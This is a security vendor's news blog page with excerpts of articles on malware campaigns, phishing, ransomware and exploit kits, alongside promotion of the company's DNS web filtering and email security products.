Internet Security News
Our Internet security news features the latest press releases from the world´s largest online security companies with details of the latest threats to be aware of and, unfortunately, Internet security news relating to significant data breaches. While some organizations will be grateful for the advanced warning of an online threat – and details of how to protect themselves against it – for some the warnings will come too late.
Consequently it is recommended to be protected against all manner of online threats with an email filter and web filter from TitanHQ. Our Internet security solutions prevent users from accessing unsafe sites via phishing emails and malvertising, and from visiting websites that are vulnerable to exploit kits and malware. As many organizations already using TitanHQ solutions would agree, it is better to be safe than sorry.
by G Hunt |
August 30, 2023 |
Internet Security News, Web Filtering
A watering hole attack, as the name suggests, is a cyberattack involving a place that is frequently visited. A threat actor uses a website that is often visited by the targeted business or individual and malware is loaded to that site and will be inadvertently downloaded or executed when a user lands on the site. The website is usually compromised by exploiting an unpatched vulnerability or by obtaining website administrator credentials. These attacks are often conducted by Advanced Persistent Threat (APT) actors in cyber espionage campaigns and one such campaign has recently been detected that has been attributed to the Chinese APT group tracked as TA423 which delivers the JavaScript-based reconnaissance tool, ScanBox. The campaign targets offshore energy firms that operate in the South China Sea. While watering hole attacks often see malware written to disk, this campaign is different as ScanBox is executed in the web browser and requires no malware to be downloaded. Once executed, ScanBox logs keystrokes and records all activity on the infected website, including any passwords that are entered. As is often the case with these watering hole attacks, the user is directed to the website via a phishing email. In this campaign targeted individuals receive messages requesting collaboration that appear to have been sent by an Australian media organization – the fictional Australian Morning News. The website to which the user is directed includes news content that has been scraped from legitimate news outlets and landing on the site will see the user served with the ScanBox framework, which is used for reconnaissance and browser fingerprinting. In addition to collecting information about the browser, operating system, extensions, and plugins, that attack sets up interactive connectivity establishment (ICE) communications with STUN servers, allowing communication with victim devices without having to go through network address translator (NAT) gateways and firewalls. Watering hole attacks have been conducted by a range of different APT groups and these attacks have been the initial access vector of choice for Iranian threat actors for several years. Earlier this...
by G Hunt |
June 22, 2023 |
Cybersecurity Advice, Internet Security News, Web Filtering
ChromeLoader is a family of malware that is extremely prevalent and persistent. The malware installs malicious browser extensions and removing them can be problematic as users are denied access to the Google Chrome extension list to prevent the removal of the malicious extensions if they are discovered. These malicious extensions are used to deliver unwanted ads, and redirect users to websites that they would otherwise not visit. At best, infection is a nuisance; however, the malware can increase the attack surface of a system and can easily lead to other malware being delivered. ChromeLoader was first observed in January 2022 and infections are now extremely widespread. The malware is most commonly spread via sites that offer pirated software – torrents and warez sites – with the malware usually delivered through infected ISO image files. Several campaigns have been detected that advertise pirated software, games, and movies on social media networks, especially Twitter, with the posts/tweets including links to download sites. When the installation file is downloaded and installed, the user will likely get the software, operating system, or game they are expecting, but ChromeLoader and/or other malware will also be installed. A new ChromeLoader distribution campaign has recently been detected by HP’s Wolf Security team. They report that the campaign has been active since at least March 2023 and delivers ChromeLoader, which installs a malicious adware browser extension called Shampoo. Shampoo will perform unwanted redirects to a variety of websites, including fake giveaways, games, and dating sites. These redirects can simply be annoying but can risk other malware infections. The malicious browser extension is also difficult to uninstall as the user will be prevented from accessing Chrome Extensions. If the user does manage to uninstall the adware, it will simply be reloaded when the device is rebooted via a Windows scheduled task. According to HP, this campaign uses a network of malicious websites that offer pirated material. The download sites deliver VBScripts that execute PowerShell scripts that fetch Shampoo and install the malicious Chrome extension....
by G Hunt |
April 30, 2023 |
Cybersecurity Advice, Internet Security News, Security Awareness Training
There has been a notable increase in search engine poisoning for distributing malware. Search engine poisoning is the term given to the manipulation of search engine results to display links to malicious websites. These websites can be used to phish for sensitive information, but this technique is most commonly used for distributing malware. Search engine poisoning can be achieved in different ways. One of the ways search engine poisoning is used to target businesses is to create a webpage and use search engine optimization techniques to target specific search queries. It can take a lot of time an effort to get webpages appearing in the organic search results for key search terms, but since the queries typically targeted have little competition, it is quite easy to get pages appearing high up in the organic search engine listings. Attackers typically target low volume business search queries, such as searches for contract templates, forms, and agreements. Since the person performing the search is looking to download the content, they can easily be tricked into downloading a malicious file. Oftentimes the user will get the file they are looking for but will silently install malware when the file is opened. Google is well aware that the higher up a webpage is in the search results, the more likely it will be visited. The prime spots are at the very top of the search engine results, and that area is reserved for sponsored links. Getting a malicious site in these links will maximize the traffic to a website, and advertisers compete for these advertising slots through the Google Ads online advertising platform. Advertisers can bid for these slots for key search terms that they want to target. Google Ads are increasingly being used by malicious actors as an alternative method of search engine poisoning, and they achieve the greatest success when they target popular software downloads. An attacker will create a website advertising a popular software solution, often cloning the website of a legitimate brand. They will offer a download of that software on the site but will alter the installation file so that in addition to installing the software, malicious code will...
by G Hunt |
March 31, 2023 |
Internet Security News
Identifying phishing attempts used to be fairly straightforward for end users. The messages often contain grammatical errors and spelling mistakes that had been inadvertently included in the messages. Phishing campaigns are often conducted by individuals who do not speak English as a first language, so errors will inevitably be made and it is those errors that make it fairly easy for people to spot a phishing attempt. Those errors may soon become a thing of the past thanks to artificial intelligence tools such as ChatGPT. ChatGPT and other large language model AI tools can be used to create perfect English (or other languages) and therefore convincing text for use in phishing and social engineering attacks. Evidence is growing that these tools are being adopted by malicious actors to create phishing content that is indistinguishable from the content that a human could create, and in many cases, it is even better. Europol has recently issued an alert about the malicious use of these AI tools for phishing and warned that the problem is likely to get worse. It is not just a case of being able to draft a grammatically correct email devoid of spelling mistakes, but that these AI chatbots can write emails in whatever style the threat actor wants, including in an authoritative tone as one would expect from an official government communication. The biggest threat is likely to be highly targeted emails – spear phishing. Spear phishing has a far higher success rate than standard phishing attempts, as emails are carefully crafted to attack a very small number of individuals. That requires considerable research to ensure that the scam is convincing and the email will likely be opened and the request followed. The ability of AI tools to create spear phishing emails should not be underestimated. The messages these tools can generate can be exactly what a threat actor needs and the process can be largely automated, which means a higher success rate and more attacks. These tools are significantly lowering the barrier of entry for conducting phishing attacks, and while there are restrictions in place to prevent the malicious use of these AI tools, they are being bypassed. You...
by G Hunt |
February 28, 2023 |
Internet Security News
Exploit kits are no longer as popular as they once were, but they are still being used as a vehicle for distributing malware. An exploit kit is a program loaded on an attacker-controlled website that is able to scan for vulnerabilities when visitors land on the site and exploit those vulnerabilities to silently deliver malicious payloads. Exploit kits were first detected in 2006 and were once one of the most common ways that malware was distributed, typically exploiting vulnerabilities in browsers and browser applications such as Adobe Flash, Microsoft Silverlight, Java, and Active X to deliver information stealers, remote access Trojan’s and ransomware. Since 2017, exploit kits have been in decline, in a large part due to Adobe Flash reaching end-of-life. Adobe Flash vulnerabilities were among the most exploited vulnerabilities. Today, exploit kits are still used for distributing malware, most commonly crypto-mining malware, although under the exploit-kit-as-a-service model, they are used to deliver a variety of payloads. Today, some of the most successful exploit kits are now fileless. They write no files to the disk, instead they load malicious code into the memory. Traffic to these exploit kits is most commonly generated through malvertising – malicious adverts displayed on legitimate websites, either through the third-party ad blocks that website owners use to increase revenue or through compromised websites. In recent years, the RIG exploit kit has been one of the most successful. The RIG exploit kit first appeared in 2014 and was active until 2017, when a coordinated operation led by RSA Research successfully shut down and removed its infrastructure. According to the researchers who were part of that takedown, the operators of RIG had successfully hacked hundreds of hosting accounts – mostly on GoDaddy – and hid their malicious code inside hidden subdomains – shadow domains –to avoid detection. The RIG exploit kit was loaded onto tens of thousands of active shadow domains. The operators are thought to have gained access to those hosting accounts by conducting phishing attacks to steal credentials and through brute force attacks on hosting accounts with...
by G Hunt |
July 30, 2022 |
Internet Security News, Network Security, Security Awareness Training
Most people are aware of the importance of cybersecurity and the need to take care when opening emails, browsing the internet or downloading apps on their mobile phones. If you ask anyone whether they are knowledgeable about cybersecurity and if they can recognize a malicious website or email, there’s a high chance that they will say yes. A recent survey conducted by AT&T on 2,000 U.S. adults confirms that. 70% of the respondents to the survey said they were knowledgeable about cybersecurity, two-thirds of people said they know how hackers gain access to sensitive information on devices, and 69% of people said they were able to recognize suspicious websites at a glance. However, despite being aware of the importance of cybersecurity, cybersecurity best practices are not always followed. People take considerable risks with email and the Internet, and the survey suggests that the confidence in the ability to recognize scams, malicious websites, and suspicious emails is misplaced. While most people claim to be able to recognize a suspicious website, only 45% of respondents said they knew those sites carried a risk of identity theft. 46% of respondents were unaware of the difference between active and passive cybersecurity threats. Passive cybersecurity threats are those where a threat actor simply monitors communications and gathers sensitive information, whereas an active attack involves some action or modification of communications. An example of a passive attack is a malicious actor eavesdropping on a connection to a website via an evil twin Wi-Fi access point. An example of an active attack would be a malware attack. The average person lands on 6.5 malicious websites or suspicious social media accounts every day and in many cases, those sites are accessed deliberately. Suspicious websites include those that start with HTTP rather than HTTPS, which means the connection between the web browser and the website is not encrypted. Suspicious sites include those with lots of pop-ups, or unverified sites and social media accounts. 39% of respondents said they accessed suspicious streaming websites to view major sporting events, 37% would download files from...
by G Hunt |
June 30, 2022 |
Cybersecurity Advice, Cybersecurity News, Internet Security News, Network Security
Ransomware gangs gain initial access to business networks using a variety of techniques, with phishing one of the most common methods of gaining initial access to business networks. Phishing is used to obtain credentials, especially for cloud-based services and applications. Phishing emails are often used to deliver malware loaders. Once installed, the malware loader drops malicious payloads which ultimately results in a network-wide ransomware attack. A relatively new malware loader – Bumblebee – is now gaining popularity with ransomware gangs and is known to be used by some of the highest profile ransomware operations. According to Symantec, Bumblebee Loader is known to be used by Conti, Quantum, and Mountlocker, and possibly others, and has fast become the ransomware delivery vehicle of choice. The BumbleBee loader is primarily delivered via phishing emails and is used to create a backdoor in victims’ networks, allowing the attacker to take control of devices and execute commands. Bumblebee has been observed delivering the Cobalt Strike attack framework, which is used for lateral movement within networks. Once a sufficiently high number of devices and systems have been compromised, the BumbleBee loader drops the ransomware payload. After sensitive data has been exfiltrated from the victim’s systems, the file encryption process is initiated. According to Symantec, the Bumblebee loader has replaced several other malware variants that have proven popular with ransomware gangs in the past, such as the TrickBot Trojan and BazarLoader. The replacement of those malware variants with Bumblebee the loader appears to have been pre-planned. If the Bumblebee loader is detected on any device, rapid action should be taken as it is likely that the malware could lead to a ransomware attack. The Growing Threat of Ransomware Attacks Ransomware attacks on businesses increased significantly in 2021. The Federal Bureau of Investigation (FBI) reported in its 2021 Internet Crime Report that the FBI Internet Crime Complaint Center (IC3) received 2,084 reports of ransomware attacks between January 1 and July 31, 2021, which represents a 62% increase year-over-year. The 2021...
by G Hunt |
January 26, 2022 |
Cybersecurity Advice, Internet Privacy, Internet Security News, Web Filtering
Cybercriminals are constantly developing new tactics to trick individuals into divulging sensitive information or installing malware. One of the latest tactics to be observed is the use of QR codes to direct people to malicious websites where sensitive information is harvested or to sites hosting malware. A QR code is a machine-readable matrix barcode that is often used for tracking products in a supply chain, but in recent years has been adopted as a convenient way to direct people to web resources without them having to enter a URL or click a link. QR codes have been widely adopted during the COVID-19 pandemic for carrying out contactless operations, such as registering attendance at a venue and for viewing menus in restaurants to help prevent the spread of COVID-19. Many smartphones have in-built QR code readers and apps can be downloaded for free to allow QR codes to be read. When a smartphone camera picks up a QR code, the user will be directed to whatever web resource has been programmed into the code. While QR codes have many important uses, QR codes can be easily tampered with to direct individuals to malicious websites. Phishing emails often contain links to malicious websites that have been masked by changing the text in the hyperlink. Hovering a mouse arrow over the hyperlink on a computer will display the URL to which the user will be directed; however, with a QR code the user may be instantly directed to the website and could be prompted to enter their banking credentials, Microsoft 365 credentials, or other sensitive information. Since QR codes are often used to direct individuals to hosted files, such as PDF restaurant menus, it would be easy to trick people into downloading malicious files through QR codes. The malware could provide a cybercriminal with access to the victim’s mobile device, allowing them to steal sensitive information such as passwords or bank account information. Many businesses use QR codes to direct customers to websites where payments can be processed, and the use of QR codes for this purpose has increased significantly during the pandemic to avoid contact with Point-of-Sale card readers. QR codes could be abused to direct...
by G Hunt |
October 20, 2021 |
Internet Security News, Web Filtering
A phishing campaign has been identified that uses spoofed unemployment benefits websites to trick people into disclosing sensitive personal and financial information. These websites have been designed to closely resemble official U.S. government websites that are used to apply for unemployment benefits. Individuals arriving on the websites are prompted to enter personal and financial information as part of the claims process. The information provided can be used by the scammers to file fraudulent unemployment benefits claims and have payments directed to their accounts. The credentials and information harvested through the sites can also be used or sold to other cybercriminals to commit identity theft and fraud, with some of the sites used for installing malware onto victims’ devices, including ransomware. The U.S. Federal Bureau of Investigation (FBI) has received an increased number of complaints about these scams through its Internet Crime Complaints Center in recent weeks, prompting the FBI to issue an alert about the scams. At the time of issuing the alert, the FBI had identified 385 domains hosted on the same IP address, 8 of which impersonated official government websites that host unemployment benefit platforms. Those sites have an .xyz top-level domain (TLD) rather than .gov, and mostly impersonate state-level websites. The malicious websites include employ-nv[.]xyz, gov2go[.]xyz, illiform-gov[.]xyz, mary-landgov[.]xyz, and newstate-nm[.]xyz, which were all still active at the time of the alert, along with employ-wiscon[.]xyz, marylandgov[.]xyz, and newstatenm[.]xyz which are no longer active. Campaigns such as this are nothing new, but the number of complaints received about the scams is increasing, as are the number of reported cases of identity theft. Figures from the U.S. Federal Trade Commission show identity theft reports doubled between 2019 and 2020, with more than 1.4 million reports received last year. Several steps can be taken to avoid becoming a victim of these scams. It is important to exercise caution when visiting any website and ensure that the spelling of the web address is correct, and the website has a .gov TLD. The U.S. government...
by G Hunt |
August 18, 2021 |
Internet Security News, Network Security, Web Filtering
To those unfamiliar with DNS filtering, it is a form of web filtering that is used to filter out unwanted and undesirable web content, whether that is webpages containing objectionable material such as pornographic images or cyber threats such as websites used for phishing or malware distribution. The Domain Name System (DNS) is what makes it possible for websites to have easy-to-remember domain names. A domain name, such as google.com, is easy for people to remember, but no use to a computer, which requires an IP address to find that resource on a remote server. The DNS is used to convert a domain name into its corresponding IP address, and DNS filtering is web filtering that takes place at the DNS lookup stage of a web request before a connection is made to the server hosting the web content. DNS Filtering Myths DNS filtering has several advantages over standard web filtering. Filtering occurs before any content is downloaded, which is better for speed and security. With DNS filtering, there is next to no latency – page load speeds are unaffected. Many businesses fail to appreciate the importance of DNS filtering, after all, what is the point of blocking malware and ransomware threats on the Internet when antivirus software is installed on all end points? While AV software is effective at blocking known malware threats, it will not block new threats that have not been seen before, as the signatures of those malware variants are not in the virus definition lists of AV software. New variants of old malware versions are constantly being released to bypass signature-based AV defenses, so additional protection is needed. DNS filters can block these threats based on the reputation of IP addresses and will block downloads of file types associated with malware. DNS filtering also improves defenses against phishing attacks, which all too commonly result in costly data breaches. Phishers are constantly devising new methods to get their emails into inboxes and trick end users into clicking on links and disclosing their credentials. Spam filters will block most of these messages but not all, and security awareness training only goes so far. A web filter will block...
by G Hunt |
July 30, 2021 |
Internet Security News, Network Security
Ransomware gangs have been feeling the heat following the DarkSide ransomware attack on Colonial Pipeline in May that forced the company to shut down its fuel pipeline serving the U.S. East Coast for a week. Any attack on critical infrastructure is likely to draw a response from the U.S. government, so it is no surprise that ransomware gangs faced a great deal of scrutiny after the attack. The DarkSide group shut down following the attack, and several other ransomware gangs went quiet. DoppelPaymer was one of the gangs that appeared to be laying low. Around a week after the Colonial Pipeline attack the group went quiet and no further updates were posted on the group’s data leak site after May 6, 2021. It is not uncommon for ransomware operations to go quiet for a few weeks, but they usually return. In many cases, the threat group reappears with a tweaked ransomware variant that is used under a new name, as has happened with DoppelPaymer. DoppelPaymer attacks often start with a phishing email with links or attachments that install other malware variants, which in turn deliver the ransomware payload. Prior to the Emotet botnet being shut down, that banking Trojan was used to deliver DoppelPaymer, as well as Dridex. Security researchers investigating a new ransomware-as-a-service operation called Grief (PayorGrief) that appeared in June identified striking similarities between Grief and DoppelPaymer, leading them to the conclusion that they are one and the same. A sample of the malware was found that dates back to May 17, indicating the group had only stopped attacks for a very short period of time. Grief and DoppelPaymer both have the same encrypted file format and are both distributed in phishing emails via the Dridex botnet, with one of the analyzed Grief samples also found to link to the old DoppelPaymer portal, although the samples identified since point to a separate Grief RaaS portal. Analyses of the code and the leak site also revealed further similarities such as the use of identical encryption algorithms and matching General Data Protection Regulation (GDPR) warnings for non-paying victims about GDPR penalties. The group appears to have been quite...
by G Hunt |
July 24, 2021 |
Cybersecurity News, Internet Security News, Web Filtering
A new malware dubbed Crackonosh is being used in attacks on gamers with the goal of hijacking the resources on their computers to turn them into cryptocurrency mining rigs. Cryptocurrency prices have been soaring in recent months, with many reaching record prices. That makes mining cryptocurrency profitable, and even more so when using the powerful computers of gamers without their knowledge. The gamers cover the electricity costs and supply the hardware, while the coin mining profits go to the scammers. Getting malware onto gamers’ devices is the key to this scam, and what better way to do that than to offer gamers free versions of popular games such as Grand Theft Auto V, Pro Evolution Soccer 2018, or NBA 2K19. These cracked games can be installed without having to make a purchase, with the games offered free in forums. Currently, most infections have come via forums, but games could easily be hosted on a website and traffic driven to those sites through malicious adverts in the search engines or third-party ad blocks on any number of high traffic websites. The games are legitimate, although they have been cracked to allow them to be installed without having to purchase the game key. The correct game will be installed but bundled into the installer are several other files that will execute in the background and install Crackonosh malware, which is capable of disabling certain antivirus programs to ensure it is not detected, including Windows Defender. It also disables Windows Update to ensure that Windows Defender is not reactivated. Since the malware creates and stores an icon in the system tray, the user will most likely be unaware that their antivirus software has been disabled. One of the main aims of Crackonosh malware is to deliver a legitimate cryptomining program named XMRig, although in this case, XMRig is used to hijack the CPU and GPU of victims’ devices and use those resources for generating cryptocurrency. Using XMRig on one gaming computer will not make much money, but at scale the operation is hugely profitable. The malware distribution campaign has proven successful, with the malware found in more than a dozen countries, with the highest...
by G Hunt |
June 28, 2021 |
Cybersecurity Advice, Internet Security News, Network Security, Web Filtering
Ransomware is now one of the biggest threats faced by businesses. When hackers gain access to business networks, it is now common for large quantities of data to be stolen prior to file encryption. Ransomware gangs know all too well that businesses with good backup policies will be able to restore their encrypted data from backups, but they will need to pay the ransom in order to prevent the release or sale of the stolen data. Even when files can be recovered from backups, many businesses feel they have no alternative other than paying the ransom to ensure stolen data are deleted. Data from Coveware indicates 70% of ransomware attacks now involve data theft. Ransomware attacks are incredibly costly, even if the ransom is not paid. Universal Health Services Inc. in the United States suffered a Ryuk ransomware attack in September 2020 and the health system choose not to pay the ransom. Add up the recovery costs which included data restoration, cybersecurity consultants, notification letters to patients, and the loss of many services during the remediation process, and the cost of the attack rose to $67 million. While expensive, that high cost is just a fraction of the cost of the recent Conti ransomware attack on Ireland’s Health Service Executive. The May 2021 ransomware attack caused massive disruption to healthcare services in Ireland. Without access to patient records, patient safety was put at risk, non-urgent appointments had to be cancelled, and there were major delays getting test results. A few days after issuing a ransom demand of €20 million, the Conti ransomware gang gave the HSE the decryption tools free of charge. Even with the valid tools to decrypt data, recovery has been slow and incredibly costly. It has been around a month since the tools were provided to decrypt files, but many systems are still inaccessible. HSE Chief executive Paul Reid said it is likely to take months before all systems are brought back online. Simply eradicating the attacker from the network and recovering encrypted data is only part of the story. IT systems need to be upgraded, security greatly improved, and a security operation center needs to be set up to monitor the...
by G Hunt |
May 14, 2021 |
Cybersecurity News, Internet Security News, Web Filtering
TitanHQ has announced a new version of WebTitan Cloud has been released that brings new features and improved security. The release of WebTitan Cloud version 4.16 has allowed TitanHQ to introduce a new web filtering solution for the education sector – WebTitan OTG (on-the-go) for Chromebooks. The use of Chromebooks has been steadily increasing, especially in the education sector where they are a cost-effective option for schools to allow students to access the Internet. Internet access is important in education, but it is vital that students can access the Internet safely and securely. Controls need to be implemented to prevent students from accessing age-inappropriate content such as pornography, devices need to be protected from malware and ransomware, and phishing and other malicious websites should be blocked. WebTitan OTG for Chromebooks allows IT professionals in the education sector to easily implement web filtering controls for individuals, user groups, or globally to ensure compliance with federal and state laws, including the Children’s Internet Protection Act (CIPA) and protect their students and their devices from threats. WebTitan OTG for Chromebooks, like other WebTitan products, is a DNS-based web filter that applies filtering controls at the DNS lookup stage of web requests. That means there is no latency – Internet speed is unaffected. Since WebTitan is entirely cloud-based, there is no need for any additional hardware and the solution requires no proxies or VPNs. Set up is easy and user and device level web filtering for Chromebooks can be set up in just a few minutes. The solution provides protection for students regardless of where the Internet is accessed – students will have access to a clean, safe, filtered Internet in the classroom and at home, and it is also easy to lockdown Chromebooks to prevent any bypassing of filtering controls. Administrators also have full visibility into Internet access, including locations, web pages visited, and attempts made to visit prohibited content. Support Added for in Azure Active Directory WebTitan Cloud version 4.16 includes DNS Proxy 2.06, which supports filtering of users in Azure Active Directory,...
by G Hunt |
March 19, 2021 |
Internet Security News, Web Filtering
The pandemic forced many businesses to accelerate their digital transformation strategies to support an at home workforce and survive the pandemic; however, this new approach to working was not without risk. Cybercriminals took advantage of companies that failed to address vulnerabilities, with some of the most widely exploited vulnerabilities in 2020 in remote access solutions such as the Pulse Secure VPN. Brute force attacks against Remote Desktop Protocol skyrocketed as more businesses switched to remote working, and while many businesses have opened their offices once again, the brute force attacks are still occurring at levels far above those before the pandemic. Threat actors also stepped up their attacks on remote workers early on in the pandemic and attacks are continuing as lockdowns persist and employees continue to work from home. Many businesses address these risks through security awareness training and teach employees cybersecurity best practices and how to identify threats such as phishing. A little security awareness can go a long way and can be the difference between a threat being recognized and avoided or a link in a phishing email being clicked without thinking by an employee. There are many threats that businesses may not be aware of, one of which was highlighted by a recent YouGov survey. Throughout a large part of the pandemic, schools have been closed and children have been home schooled. The survey revealed a quarter of UK workers have allowed their children to use their corporate device as part of home schooling and for other purposes such as socializing and gaming. An employee may be aware not to engage in risky online activities, but children using work devices for Internet access leaves businesses vulnerable to cyberattacks. The survey, conducted on 2,000 UK employees, also revealed 70% of employees could access social media websites on their corporate devices and despite being one of the most fundamental aspects of security, 74% of employees said they did not use a unique password for all accounts. During the pandemic when employees are isolated and may ben struggling with home schooling as well as working, it is understandable...
by G Hunt |
February 26, 2021 |
Cybersecurity News, Email Archiving, Internet Security News, Web Filtering
TitanHQ has announced that three of its cybersecurity solutions have been named winners at the 2021 Expert Insights’ Best-Of” Awards, beating some of the best-known email security, web security, and email archiving products on the market. For more than 25 years, TitanHQ has been developing innovative cybersecurity solutions to protect businesses from email and web-based threats to their networks and data. TitanHQ’s multi-award-winning products are used by more than 8,500 businesses in over 150 countries, and 2,500 Managed Service Providers (MSPs) offer TitanHQ solutions to their customers to protect them from phishing, malware, ransomware, botnets, viruses, and other cyber threats. Expert Insights is a respected website that was created in 2018 to help businesses research and select the best cybersecurity solutions to protect their networks and data from cyber threats. Through impartial product reviews, advice from cybersecurity experts, and industry analysis, IT leaders can discover the best cybersecurity solutions to meet their unique needs. The website helps more than 40,000 businesses a month with their research into cybersecurity products and services. Each year, Expert Insights recognizes the leading cybersecurity service and solution providers and their products at the Expert Insights’ Best-Of” Awards. Technical experts with decades of experience in the cybersecurity industry assess products based on several factors, including ease of use, range of features, the protection provided, and market position, as well as how each product is rated by verified business users. The top products then receive an Expert Insights’ Best-Of” Award. This year, TitanHQ was recognized by Expert Insights for the powerful threat protection provided by its products, the ease-of-use of the solutions, and their cost-effectiveness, which is why the solutions have proven to be so popular with enterprises, SMBs and MSPs looking for comprehensive protection against email and web-based threats. “2020 was an unprecedented year of cybersecurity challenges, with a rapid rise in remote working causing a massive acceleration in cybercrime,” said Expert Insights CEO and Founder...
by G Hunt |
January 30, 2021 |
Cybersecurity Advice, Internet Security News, Network Security, Web Filtering
DNS filtering – or Domain Name System filtering to give it its full title – is a technique of blocking access to certain websites, webpages, and IP addresses. The DNS is what allows easy to remember domain names to be used – such as Wikipedia.com – rather than typing in very difficult to remember IP addresses – such as 198.35.26.96. The DNS maps IP addresses to domain names to allow computers to find web resources. When a domain is purchased from a domain register and that domain is hosted, it is assigned a unique IP address that allows the site to be located. When you attempt to access a website, a DNS query will be performed. Your DNS server will look up the IP address of the domain/webpage, which will allow your browser to make a connection to the web server where the website is hosted. The webpage will then be loaded. The actual process involves several different steps, but it is completed in a fraction of a second. So how does DNS Web Filtering Work? With DNS filtering in place, rather than the DNS server returning the IP address if the website exists, the request will be subjected to certain controls. DNS blocking occurs if a particular webpage or IP address is known to be malicious. The DNS filter will use blacklists of known malicious websites, previous crawls of new websites and web pages, or web content will be assessed in real time if the web page or website has not previously been crawled and categorized. If the website trying to be accessed is determined to be malicious or otherwise violates pre-defined policies, instead of the user being connected to the website, the browser will be directed to a local IP address that displays a block page explaining why the site cannot be accessed. This control could be applied at the router level, via your ISP, or by a web filtering service provider. In the case of the latter, the user – a business for instance – would point their DNS to the service provider. That service provider maintains a blacklist of malicious webpages/IP addresses and access to those sites is prevented. Since the service provider will also categorize webpages, the DNS filter can also be used to block access to certain categories of...
by G Hunt |
January 27, 2021 |
Cybersecurity News, Internet Security News
A phishing campaign is underway which is distributing a new variant of the DanaBot Trojan. The DanaBot Trojan was first identified in May 2018 and has been actively distributed via phishing emails for more than two years. In the summer of 2020, activity slowed but the campaigns resumed in October. DanaBot is a modular banking Trojan used in targeted geographical attacks on businesses. The first variant that emerged in 2018 was used in targeted attacks in Australia, while the second variant was primarily used in attacks on U.S. companies. Attacks have also been conducted in Europe, primarily in Ukraine, Austria, Poland, Italy, and Germany. The latest variant is the fourth to be identified and has been released around a year after the third variant was identified in February 2019. The latest variant has had several technical anti-analysis changes made to the main component of the malware and its method of maintaining persistence has changed. The latest variant now achieves persistence through a LNK file loaded into the user’s startup folder, which launches the malware when the device is booted. Affiliates are used to conduct campaigns distributing the DanaBot Trojan under the malware-as-a-service model. Several new affiliate IDs have been added which suggests the malware-as-a-service operation is growing. It is therefore probable that DanaBot will grow into a much bigger threat in 2021. Previously, DanaBot has been primarily distributed via spam emails that deliver a malware dropper, which downloads the banking Trojan via a multi-stage process. It now appears that the malware is being distributed via websites that offer cracks and software keys for pirated software such as graphics software, VPNs, antivirus software, and games. Protecting Against Banking Trojans by Blocking Malware Delivery Protecting against DanaBot and other Trojans requires a range of security measures. Two of the most important are an advanced spam filter and a web filtering solution. The spam filter will detect malicious emails that attempt to deliver the malware dropper, while the web filter will block access to the websites that are used to download the malware. TitanHQ has developed a...
by G Hunt |
January 25, 2021 |
Cybersecurity Advice, Internet Security News, Network Security
COVID-19 presented many new opportunities for cybercriminals, many of which have proven to be highly successful. In the early days of the pandemic, when it became clear that the new coronavirus was spreading beyond the borders of China and concern about the virus grew, cybercriminals switched from their normal phishing campaigns and started adopting COVID-19 lures. Phishing campaigns were conducting offering advice about the virus, potential cures, and advice as people craved information that was in short supply. Fake COVID-19 tracking apps and websites were set that collected sensitive information or installed malware, and PPE shortages saw fake shops set up offering non-existent supplies. Then there were fake charities, disinformation campaigns, and phishing scams related to job retention schemes, self-employment income support, government coronavirus loans, and fake tax rebates. The move to remote working due to the pandemic saw hackers targeting vulnerabilities in remote working solutions such as VPNs and throughout 2020, ransomware gangs have been extremely active, especially in Q3 and Q4, 2020 when attacks soared. As we move into 2021, cybercriminals are likely to continue to exploit the pandemic to steal credentials, access sensitive data, and spread malware and ransomware, so it is important for businesses not to let their guard drop and to continue to ensure that they have appropriate protections in place to block threats. The Cyber Threat Landscape in 2021 The high level of ransomware attacks in the last quarter of 2020 is likely to continue in 2021. There are no signs that cybercriminals will reduce attacks, as they are still proving to be profitable. The healthcare industry is likely to continue to be targeted, with cyberattacks on pharmaceutical and clinical research firms also extremely likely. Now that COVID-19 vaccines have been approved and are starting to be rolled out, cybercriminals have yet another opportunity. The vaccine rollout is likely to take many months and it could well be the autumn or later before most people receive the vaccine. Cybercriminals have already adopted COVID-19 vaccine lures to obtain sensitive information and spread...
by G Hunt |
June 26, 2020 |
Internet Security News, Web Filtering
The notorious cybercriminal organization Evil Corp, which was responsible for the Dridex and Zeus banking Trojans and BitPaymer ransomware, have started using a brand new ransomware called Wastedlocker, so named due to the .wasted extension which is used on encrypted files. Evil Corp has been relatively quiet in recent months following the indictment of two high-profile members of the group by the U.S. Department of Justice in December 2019 for their role in the creation and distribution of Dridex and Zeus. The group bounced back with relatively low-level campaigns in January, but there has been little activity since. It appears that the time has been spent developing WastedLocker ransomware, which appears to have been mostly written from scratch. WastedLocker ransomware was first used in May 2020 and is believed to be a replacement for BitPaymer ransomware. In the short space of time that the new ransomware has been in use, attacks have been conducted on at least 31 organizations, according to data from Symantec. Most of the victims are located in the United States, eight of which are Fortune 500 companies and 11 are publicly listed. Attacks have been conducted on companies operating in a wide range of industry sectors, with the manufacturing, information technology, and media and telecommunications sectors experiencing the highest number of attacks. Evil Corp appears to be targeting large organizations with deep enough pockets to pay the sizeable ransom demand, which has ranged from $500,000 to $10 million in some cases. In contrast to many other ransomware operators, Evil Corp does not steal data prior to file encryption, although that could well change in the future. The group certainly has the technical skill to adopt that tactic, but it appears that they have refrained from doing so to stay under the radar. WastedLocker ransomware is downloaded using the JavaScript framework SocGholish under the guise of a browser update. Symantec has identified more than 150 websites that have been compromised that are being used as part of the campaign to deliver the ransomware payload. Once a network has been compromised, the attackers use living-off-the-land tactics...
by G Hunt |
April 29, 2020 |
Cybersecurity News, Internet Security News
The massive increase employees working reportedly has not been missed by cybercriminals, who are actively targeting these workers using a variety of tactics to fool them into disclosing their credentials or installing malware. Phishing attacks remain the most common method used to attack remote workers, but there has also been a notable increase in malvertising during the COVID-19 pandemic. Malvertising is the practice of creating malicious adverts which are syndicated across legitimate websites through third-party ad networks. The malicious adverts are used to redirect website visitors to webpages where credentials are harvested, malware is downloaded, or to other scams to obtain fraudulent payments or charitable donations. Several COVID-19 themed ploys have been used in these malvertising campaigns to trick people into downloading malware. These scams prey on fears about SARS-CoV-19, often spoofing WHO and other COVID-19 authorities to add legitimacy to the campaigns. A common theme is an offer of important advice on how to protect against COVID-19. There rise in malvertising activity during the COVID-19 pandemic has been significant, with some reports indicating the number of malicious adverts have doubled in March compared to standard levels of malicious advert activity prior to the pandemic. A malvertising campaign was recently identified that spoofed the anti-malware software vendor Malwarebytes. The campaign claimed the user’s computer was infected with malware and a download of Malwarebytes’ software was required to remove the infections. The malicious webpage used for the scam was on a malwarebytes-free domain that was registered on March 29, 2020. The site used a copycat template created from stolen branding from the genuine site. Any individual that landed on the website that was using the Internet Explorer browser was redirected to a webpage hosting the Fallout exploit kit that silently downloads the Raccoon information stealer. There was a major increase in domain registrations related to COVID-19 in March. While not all of these websites are currently being used for nefarious purposes, many are being used for scamming. NTT recently 